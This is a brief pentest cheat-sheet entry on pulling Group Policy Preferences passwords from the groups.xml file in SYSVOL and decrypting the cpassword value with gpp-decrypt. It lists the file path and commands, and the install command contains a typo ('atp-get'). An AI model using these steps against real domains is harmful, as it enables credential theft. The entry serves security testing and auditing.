Gpp Password

Group policy preferences password

#Extract Group Policy Password

#via Sysvol or the Replication \fqdn\policies\{Guid}\preferences\groups\groups.xml

sudo atp-get install gpp-decrypt

search groups.xml for name and cpassword

copy cpassword

gpp-decrypt 'cpassword hash value'

Last updated